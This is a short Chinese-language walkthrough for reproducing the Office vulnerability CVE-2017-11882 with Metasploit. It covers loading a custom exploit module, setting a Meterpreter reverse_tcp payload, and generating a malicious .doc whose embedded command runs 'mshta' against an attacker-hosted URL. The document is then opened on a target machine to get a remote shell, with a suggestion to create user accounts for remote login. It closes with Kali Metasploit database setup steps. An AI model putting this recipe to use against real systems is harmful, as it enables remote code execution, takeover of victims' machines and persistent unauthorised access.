office漏洞 (CVE-2017-11882)复现

在/usr/share/metasploit-framework/modules/exploits/windows/smb上传 cve_2017_1182.rb

在/usr/share/metasploit-framework/data/exploits上传cve-2017-1182.rtf文件

以上的文件准备好后即可用msf来进行操作

在搜索模块的时候出现以下错误

可以使用reload_all重新加载模块

使用use exploit/windows/smb/cve_2017_11882这个模块：

先用show options查看参数设置：这里除了设置URIPATH,还要设置payload，lhost

set LHOST ip

设置payload：set payload windows/meterpreter/reverse_tcp

设置URIPATH:set URIPATH test（这里设置的路径在下面运行python脚本时要把路径加上）

查看端口设置：

运行：exploit

在桌面上上传Command109b_CVE-2017-11882.py

使用命令：python Command109b_CVE-2017-11882.py -c "mshta http://192.168.1.117:8080/test" -o test1.doc

将生成的文件复制到目标机上打开文件，攻击机上传回来了session，说明攻击成功

输入sessions,可以看到两个session

使用命令：session -i 2选择会话2

使用shell，使用whoami查看权限，可以进行创建用户进行远程登录。

在kali 2.0中启动带数据库支持的MSF方式如下：
1 首先启动postgresql数据库：
/etc/init.d/postgresql start；或者 service postgresql start；
2 初始化MSF数据库（关键步骤！）：msfdb init；（如不能初始化，就用msfdb reinit试试吧！默认创建的数据库名：msf，msf_test;用户名：msf；口令默认为空）
3 运行msfconsole：msfconsole；
4 在msf中查看数据库连接状态：db_status。
5更新metasploit:msfupdate